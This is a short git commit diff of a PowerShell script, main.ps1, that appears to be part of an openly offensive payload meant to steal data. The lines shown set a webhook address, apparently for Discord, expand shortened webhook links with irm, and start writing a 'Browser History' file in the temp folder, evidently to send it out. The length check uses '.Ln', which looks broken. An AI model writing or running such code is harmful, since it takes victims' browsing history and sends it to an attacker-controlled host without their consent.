Update main.ps1

This commit is contained in:
egieb
2024-01-02 21:45:18 +00:00
committed by GitHub
parent 9c40348978
commit f70eb231f0

View File

@@ -1,6 +1,9 @@
$whuri = "$dc"
# shortened URL Detection
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
$outpath = "$env:temp\history.txt"
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII